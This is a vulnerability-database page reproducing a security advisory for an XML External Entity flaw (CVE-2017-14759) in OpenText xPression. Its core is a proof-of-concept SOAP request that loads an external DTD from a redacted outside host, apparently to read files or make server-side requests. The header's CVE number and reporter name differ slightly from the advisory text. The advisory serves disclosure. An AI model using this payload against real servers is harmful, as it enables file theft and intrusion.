Lucene search
K

OpenText Document Sciences xPression 4.5SP1 Patch 13 XML Injection

🗓️ 29 Sep 2017 00:00:00Reported by Mariusz WoloszynType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 58 Views

OpenText Document Sciences xPression 4.5SP1 Patch 13 XML Injection CVE-2017-1475

Related
Code
ReporterTitlePublishedViews
Family
CNVD
OpenText Document Sciences xPression XML External Entity Vulnerability
9 Oct 201700:00
cnvd
CVE
CVE-2017-14759
2 Oct 201717:00
cve
Cvelist
CVE-2017-14759
2 Oct 201717:00
cvelist
EUVD
EUVD-2017-6254
7 Oct 202500:30
euvd
NVD
CVE-2017-14759
3 Oct 201701:29
nvd
OSV
CVE-2017-14759
3 Oct 201701:29
osv
Prion
Xxe
3 Oct 201701:29
prion
`Title: OpenText Document Sciences xPression (formerly EMC Document  
Sciences xPression) - XML External Entity  
Author: Marcin Woloszyn  
Date: 27. September 2017  
CVE: CVE-2017-14759  
  
Affected Software:  
==================  
OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)  
  
Exploit was tested on:  
======================  
v4.5SP1 Patch 13 (older versions might be affected as well)  
  
XML External Entity:  
====================  
  
Application XML parser is accepting DOCTYPE in provided XML documents  
either directly or indirectly, using URL.  
This can be exploited in various of ways, e.g. to read directory  
listings, read system or application files,  
cause denial of service or issue requests on behalf of server (SSRF).  
  
Vector :  
--------  
  
POST /xFramework/services/QuickDoc.QuickDocHttpSoap11Endpoint/ HTTP/1.1  
Accept-Encoding: gzip,deflate  
Content-Type: text/xml;charset=UTF-8  
SOAPAction: "urn:publishDocument"  
Content-Length: 13689  
Host: [...cut...]  
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)  
Connection: close  
  
<soapenv:Envelope  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:web="http://webservice.framework.xprs.dsc.com">  
<soapenv:Header/>  
<soapenv:Body>  
<web:publishDocument>  
<web:requestContext><![CDATA[<!DOCTYPE m [ <!ENTITY % r  
SYSTEM "http://[...cut...]/m.xml"> %r; %i; %t; ]><RequestContext>  
<Credentials method="UserID and Password">  
<UserID>[...cut...]</UserID>  
<Password>[...cut...]</Password>  
</Credentials>  
<ApplicationName>ELease</ApplicationName>  
</RequestContext>]]>  
</web:requestContext>  
<web:documentName>[...cut...]</web:documentName>  
<web:customerData>  
<![CDATA[  
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xsi:noNamespaceSchemaLocation="C:\xPression\CustomerData\Schema\eLease_v0.3.xsd">  
<eLease>  
<PrintStatus>Final</PrintStatus>  
[...cut...]  
</eLease>  
</root>  
]]> </web:customerData>  
<!--Optional:-->  
<web:outputProfileName>PDF w Draftwatermark to  
File</web:outputProfileName>  
</web:publishDocument>  
</soapenv:Body>  
</soapenv:Envelope>  
  
Fix:  
====  
https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774  
  
Contact:  
========  
mw[at]nme[dot]pl  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation